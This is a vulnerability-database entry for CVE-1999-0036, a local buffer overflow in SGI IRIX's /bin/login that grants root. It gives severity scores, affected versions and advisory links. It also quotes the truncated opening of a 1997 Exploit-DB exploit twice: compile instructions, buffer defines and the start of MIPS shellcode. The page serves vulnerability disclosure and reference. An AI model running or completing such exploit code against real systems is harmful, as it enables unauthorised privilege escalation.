CVE-1999-0036
published 1997-05-26CVE-1999-0036: IRIX login program with a nonzero LOCKOUT parameter allows creation or damage to files.
PriorityP421high8.4CVSS 3.1
AVLACLPRNUINSUCHIHAH
EXPLOIT
EPSS
1.41%
69.4th percentile
IRIX login program with a nonzero LOCKOUT parameter allows creation or damage to files.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
CVSS provenance
nvdv3.18.4HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SGI IRIX - '/bin/login' Local Buffer Overflow
exploitdb·1997-05-26
CVE-1999-0036 SGI IRIX - '/bin/login' Local Buffer Overflow
SGI IRIX - '/bin/login' Local Buffer Overflow
---
/* /bin/login exploit by DCRH 24/5/97
*
* Tested on: R3000 Indigo (Irix 5.3)
* R4400 Indy (Irix 5.3)
* R5000 O2 (Irix 6.3)
* R8000 Power Challenge (Irix 6.2)
*
* Compile as: cc -n32 login.c (for Irix 6.x)
* cc login.c (for Irix 5.x)
*
* Press enter when prompted for a password
*
*/
#include
#include
#include
#include
#include
#define BUF_LENGTH 200
#define EXTRA 300
#define OFFSET 0x1b0
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
#define u_long unsigned
u_long get_sp_code[] = {
0x03a01025, /* move $v0,$sp */
0x03e00008, /* jr $ra */
0x00000000, /* nop */
};
u_long irix_shellcode[] = {
0x24041234, /* li $4,0x1234 */
0x2084edcc, /* sub $4,0x1234 */
0x0491fffe, /* bgezal $4,pc-4 */
0x03bd302a, /* sgt $6,$sp,$sp */
0x23e4012c, /* add
Exploit-DB
SGI IRIX 6.4 - 'login' Local Privilege Escalation
exploitdb·1997-05-26
CVE-1999-0036 SGI IRIX 6.4 - 'login' Local Privilege Escalation
SGI IRIX 6.4 - 'login' Local Privilege Escalation
---
/*
source: https://www.securityfocus.com/bid/392/info
A buffer overflow exists in the /bin/login program supplied by Silicon Graphics, as part of their Irix operating system. By supplying a carefully crafted, log buffer to the -h option of login, a local user can obtain root privileges.
*/
/* /bin/login exploit by DCRH 24/5/97
*
* Tested on: R3000 Indigo (Irix 5.3)
* R4400 Indy (Irix 5.3)
* R5000 O2 (Irix 6.3)
* R8000 Power Challenge (Irix 6.2)
*
* Compile as: cc -n32 login.c (for Irix 6.x)
* cc login.c (for Irix 5.x)
*
* Press enter when prompted for a password
*
*/
#include
#include
#include
#include
#include
#define BUF_LENGTH 200
#define EXTRA 300
#define OFFSET 0x1b0
#define IRIX_NOP 0x03e0f825 /* move $ra,$ra */
#define u_l
No writeups or analysis indexed.
ftp://patches.sgi.com/support/free/security/advisories/19970508-02-PXhttp://www.ciac.org/ciac/bulletins/h-106.shtmlhttp://www.osvdb.org/990https://exchange.xforce.ibmcloud.com/vulnerabilities/557ftp://patches.sgi.com/support/free/security/advisories/19970508-02-PXhttp://www.ciac.org/ciac/bulletins/h-106.shtmlhttp://www.osvdb.org/990https://exchange.xforce.ibmcloud.com/vulnerabilities/557
1997-05-26
Published